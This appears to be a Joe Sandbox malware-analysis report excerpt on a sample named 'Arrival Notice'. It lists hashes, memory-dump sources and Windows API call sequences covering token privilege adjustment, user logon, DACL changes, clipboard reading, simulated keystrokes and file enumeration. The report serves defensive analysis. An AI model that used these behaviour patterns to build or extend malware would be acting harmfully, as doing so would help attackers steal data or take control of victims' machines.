                  Similarity
                  • API ID: InfoParametersSystem
                  • String ID:
                  • API String ID: 3098949447-0
                  • Opcode ID: 8eddf01fa3c6c3a29a33ff09aeee534ffc52c4a4ed1ef0e269e827c8d188cd01
                  • Instruction ID: 4142dddbe8f2abdddf7d38843c9bbf0b0f3b89a7665409e7862b7f08c415c7f4
                  • Opcode Fuzzy Hash: 8eddf01fa3c6c3a29a33ff09aeee534ffc52c4a4ed1ef0e269e827c8d188cd01
                  • Instruction Fuzzy Hash: 49C09B352C0314BFF2154780FD4AF587754A348B00F044415F709555F3C3F11410D758
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction ID: 2709430826b94f3e52772312029527651cd230ad3e18f5382d5818f8e9e41236
                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction Fuzzy Hash: E631E474A001099FC71ADF59D484E69FBA6FF49310B25C6A9E80ACB655D731EDC1CBC0
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 035222B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction ID: 48d9d169d70ee2970a70688cfb5fdafc229c7187445c739fd1e48889a6194171
                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction Fuzzy Hash: D6E0E67594010EDFDB00EFB8D54969E7FB4FF04301F1005A1FD05D2290D6319D508A72
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044961A
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044965B
                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0044969F
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004496C9
                  • SendMessageW.USER32 ref: 004496F2
                  • GetKeyState.USER32(00000011), ref: 0044978B
                  • GetKeyState.USER32(00000009), ref: 00449798
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004497AE
                  • GetKeyState.USER32(00000010), ref: 004497B8
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004497E9
                  • SendMessageW.USER32 ref: 00449810
                  • SendMessageW.USER32(?,00001030,?,00447E95), ref: 00449918
                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044992E
                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00449941
                  • SetCapture.USER32(?), ref: 0044994A
                  • ClientToScreen.USER32(?,?), ref: 004499AF
                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004499BC
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004499D6
                  • ReleaseCapture.USER32 ref: 004499E1
                  • GetCursorPos.USER32(?), ref: 00449A19
                  • ScreenToClient.USER32(?,?), ref: 00449A26
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00449A80
                  • SendMessageW.USER32 ref: 00449AAE
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00449AEB
                  • SendMessageW.USER32 ref: 00449B1A
                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00449B3B
                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00449B4A
                  • GetCursorPos.USER32(?), ref: 00449B68
                  • ScreenToClient.USER32(?,?), ref: 00449B75
                  • GetParent.USER32(?), ref: 00449B93
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00449BFA
                  • SendMessageW.USER32 ref: 00449C2B
                  • ClientToScreen.USER32(?,?), ref: 00449C84
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00449CB4
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00449CDE
                  • SendMessageW.USER32 ref: 00449D01
                  • ClientToScreen.USER32(?,?), ref: 00449D4E
                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00449D82
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  • GetWindowLongW.USER32(?,000000F0), ref: 00449E05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                  • String ID: @GUI_DRAGID$F$p#H
                  • API String ID: 3429851547-2467187759
                  • Opcode ID: e2c4b29eccb904c086da3cc8eace782eb01e5ef8383caf636d704636c6a85ce8
                  • Instruction ID: 82da44f5e9bf04558232d1a7ce4a2ede6629ad1e7a89bacef4062451d746aa13
                  • Opcode Fuzzy Hash: e2c4b29eccb904c086da3cc8eace782eb01e5ef8383caf636d704636c6a85ce8
                  • Instruction Fuzzy Hash: 8D429A74204201AFE721CF24CC85EABBBE5EF49310F154A2AF699872A1D735AC51EF49
                  APIs
                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004448F3
                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00444908
                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00444927
                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0044494B
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0044495C
                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0044497B
                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004449AE
                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004449D4
                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00444A0F
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00444A56
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00444A7E
                  • IsMenu.USER32(?), ref: 00444A97
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00444AF2
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00444B20
                  • GetWindowLongW.USER32(?,000000F0), ref: 00444B94
                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00444BE3
                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00444C82
                  • wsprintfW.USER32 ref: 00444CAE
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00444CC9
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00444CF1
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00444D13
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00444D33
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00444D5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                  • String ID: %d/%02d/%02d
                  • API String ID: 4054740463-328681919
                  • Opcode ID: a90677cad1c29f2e5d729d5404a101d5cbb9fb0b5288621881e5518a92afb04d
                  • Instruction ID: f362856c109a747b0417e0abe74a8c0e69fa5bc91412ab3d5c0226637ed8ef0e
                  • Opcode Fuzzy Hash: a90677cad1c29f2e5d729d5404a101d5cbb9fb0b5288621881e5518a92afb04d
                  • Instruction Fuzzy Hash: 2112E071600214ABFB259F24CC49FAF7BF8EF85310F14412AF916EA2E1DB789941CB58
                  APIs
                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 003CF998
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040F474
                  • IsIconic.USER32(00000000), ref: 0040F47D
                  • ShowWindow.USER32(00000000,00000009), ref: 0040F48A
                  • SetForegroundWindow.USER32(00000000), ref: 0040F494
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F4AA
                  • GetCurrentThreadId.KERNEL32 ref: 0040F4B1
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F4BD
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0040F4CE
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0040F4D6
                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0040F4DE
                  • SetForegroundWindow.USER32(00000000), ref: 0040F4E1
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F4F6
                  • keybd_event.USER32(00000012,00000000), ref: 0040F501
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F50B
                  • keybd_event.USER32(00000012,00000000), ref: 0040F510
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F519
                  • keybd_event.USER32(00000012,00000000), ref: 0040F51E
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0040F528
                  • keybd_event.USER32(00000012,00000000), ref: 0040F52D
                  • SetForegroundWindow.USER32(00000000), ref: 0040F530
                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0040F557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                  • String ID: Shell_TrayWnd
                  • API String ID: 4125248594-2988720461
                  • Opcode ID: d414bb194d77353bd45d476bfcf7d550b9389a5c36906a90a36136488ca1d1d5
                  • Instruction ID: 075979b92febc2242994b4523b53f190aa478b5b45d1d04242018c182ac9a0b3
                  • Opcode Fuzzy Hash: d414bb194d77353bd45d476bfcf7d550b9389a5c36906a90a36136488ca1d1d5
                  • Instruction Fuzzy Hash: B3316375A41228BBEB306BB55C8AFBF7E6CEB45B50F150036FA00F61D1C6B45D00AA69
                  APIs
                    • Part of subcall function 004116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                    • Part of subcall function 004116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                    • Part of subcall function 004116C3: GetLastError.KERNEL32 ref: 0041174A
                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00411286
                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004112A8
                  • CloseHandle.KERNEL32(?), ref: 004112B9
                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004112D1
                  • GetProcessWindowStation.USER32 ref: 004112EA
                  • SetProcessWindowStation.USER32(00000000), ref: 004112F4
                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00411310
                    • Part of subcall function 004110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004111FC), ref: 004110D4
                    • Part of subcall function 004110BF: CloseHandle.KERNEL32(?,?,004111FC), ref: 004110E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                  • String ID: $default$winsta0$ZG
                  • API String ID: 22674027-460506031
                  • Opcode ID: f86bcd8a73485e4849030686f4fa6fca456a7a149ca1fae0410cd3292873b608
                  • Instruction ID: fe5a101ffb5bd38c4c0431c04b6f00887eac7c3d5a969882764838f697957df1
                  • Opcode Fuzzy Hash: f86bcd8a73485e4849030686f4fa6fca456a7a149ca1fae0410cd3292873b608
                  • Instruction Fuzzy Hash: 6181B371900209AFDF119FA4DC49FEF7BB9EF05704F18412AFA10E62A0D7798984CB29
                  APIs
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                    • Part of subcall function 004110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                    • Part of subcall function 004110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                    • Part of subcall function 004110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00410BCC
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00410C00
                  • GetLengthSid.ADVAPI32(?), ref: 00410C17
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00410C51
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00410C6D
                  • GetLengthSid.ADVAPI32(?), ref: 00410C84
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00410C8C
                  • HeapAlloc.KERNEL32(00000000), ref: 00410C93
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00410CB4
                  • CopySid.ADVAPI32(00000000), ref: 00410CBB
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00410CEA
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00410D0C
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00410D1E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D45
                  • HeapFree.KERNEL32(00000000), ref: 00410D4C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D55
                  • HeapFree.KERNEL32(00000000), ref: 00410D5C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410D65
                  • HeapFree.KERNEL32(00000000), ref: 00410D6C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00410D78
                  • HeapFree.KERNEL32(00000000), ref: 00410D7F
                    • Part of subcall function 00411193: GetProcessHeap.KERNEL32(00000008,00410BB1,?,00000000,?,00410BB1,?), ref: 004111A1
                    • Part of subcall function 00411193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00410BB1,?), ref: 004111A8
                    • Part of subcall function 00411193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00410BB1,?), ref: 004111B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: c2402458dfbc2bead8a552587e71a81cadd263c084dabd5387e6eeb9c0acf3b1
                  • Instruction ID: 5db205183cd3beb32c538a7d610ee70a8240144d86469231892f9513a23729e4
                  • Opcode Fuzzy Hash: c2402458dfbc2bead8a552587e71a81cadd263c084dabd5387e6eeb9c0acf3b1
                  • Instruction Fuzzy Hash: AD716F7590120AABDF10DFE4DD84BEFBBB8BF05300F044526E914A7251D7B9A985CF64
                  APIs
                  • OpenClipboard.USER32(0044CC08), ref: 0042EB29
                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0042EB37
                  • GetClipboardData.USER32(0000000D), ref: 0042EB43
                  • CloseClipboard.USER32 ref: 0042EB4F
                  • GlobalLock.KERNEL32(00000000), ref: 0042EB87
                  • CloseClipboard.USER32 ref: 0042EB91
                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0042EBBC
                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0042EBC9
                  • GetClipboardData.USER32(00000001), ref: 0042EBD1
                  • GlobalLock.KERNEL32(00000000), ref: 0042EBE2
                  • GlobalUnlock.KERNEL32(00000000,?), ref: 0042EC22
                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0042EC38
                  • GetClipboardData.USER32(0000000F), ref: 0042EC44
                  • GlobalLock.KERNEL32(00000000), ref: 0042EC55
                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0042EC77
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042EC94
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042ECD2
                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0042ECF3
                  • CountClipboardFormats.USER32 ref: 0042ED14
                  • CloseClipboard.USER32 ref: 0042ED59
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                  • String ID:
                  • API String ID: 420908878-0
                  • Opcode ID: 6218823773cf4568fac66e48d3da6d6dfb0414db60c7025f2f36194346505e00
                  • Instruction ID: f2e9727697eccac667a15369835d6da8ade05ba1585bb957ffe7379f34b2e28e
                  • Opcode Fuzzy Hash: 6218823773cf4568fac66e48d3da6d6dfb0414db60c7025f2f36194346505e00
                  • Instruction Fuzzy Hash: 1F6105342043029FD300EF21E884F6A7BE4AF85704F58446EF5468B2A2CB75ED05CB6A
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 004269BE
                  • FindClose.KERNEL32(00000000), ref: 00426A12
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00426A4E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00426A75
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00426AB2
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00426ADF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                  • API String ID: 3830820486-3289030164
                  • Opcode ID: f832ce2a46f0e7e138b3c63260e14d787a656621591fa299f6fb2f39dc43a96d
                  • Instruction ID: bfc3c58c6fcae487e83314eb0305049de0b75dc09a450045825b84d5683bdcab
                  • Opcode Fuzzy Hash: f832ce2a46f0e7e138b3c63260e14d787a656621591fa299f6fb2f39dc43a96d
                  • Instruction Fuzzy Hash: 93D16471508300AFC711EB64D886EABB7ECAF89704F44491EF689DB251EB74DA44CB62
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00429663
                  • GetFileAttributesW.KERNEL32(?), ref: 004296A1
                  • SetFileAttributesW.KERNEL32(?,?), ref: 004296BB
                  • FindNextFileW.KERNEL32(00000000,?), ref: 004296D3
                  • FindClose.KERNEL32(00000000), ref: 004296DE
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 004296FA
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042974A
                  • SetCurrentDirectoryW.KERNEL32(00476B7C), ref: 00429768
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00429772
                  • FindClose.KERNEL32(00000000), ref: 0042977F
                  • FindClose.KERNEL32(00000000), ref: 0042978F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                  • String ID: *.*
                  • API String ID: 1409584000-438819550
                  • Opcode ID: 98e8ab0b2f163abfd4a04ca4a14ecbfbd46758e8cca06c5afc52fb4f207a5d6f
                  • Instruction ID: 97e4743001bd377da7d69f66e10ef0ab60c766ccbf3716bb7faca6264634b3ea
                  • Opcode Fuzzy Hash: 98e8ab0b2f163abfd4a04ca4a14ecbfbd46758e8cca06c5afc52fb4f207a5d6f
                  • Instruction Fuzzy Hash: 0831F836601629ABDB10AFB4EC49ADF37ACAF4A320F5440A7F904E2190D778DD448A1C
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004297BE
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00429819
                  • FindClose.KERNEL32(00000000), ref: 00429824
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00429840
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00429890
                  • SetCurrentDirectoryW.KERNEL32(00476B7C), ref: 004298AE
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004298B8
                  • FindClose.KERNEL32(00000000), ref: 004298C5
                  • FindClose.KERNEL32(00000000), ref: 004298D5
                    • Part of subcall function 0041DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0041DB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                  • String ID: *.*
                  • API String ID: 2640511053-438819550
                  • Opcode ID: b5dad5691d5f52c543aa9a11a781cdd6e6af6ca10728de773929938c4bc4e33f
                  • Instruction ID: 4f855214df90bf1617a894b726f4a62019501af49d2ca0e76ba27f156e8cc8f8
                  • Opcode Fuzzy Hash: b5dad5691d5f52c543aa9a11a781cdd6e6af6ca10728de773929938c4bc4e33f
                  • Instruction Fuzzy Hash: E331DA316016296ADF14EFB5FC44ADF776CAF06320F584167E914E2290DB78DD45CA2C
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00428257
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00428267
                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00428273
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00428310
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428324
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428356
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0042838C
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryTime$File$Local$System
                  • String ID: *.*
                  • API String ID: 1464919966-438819550
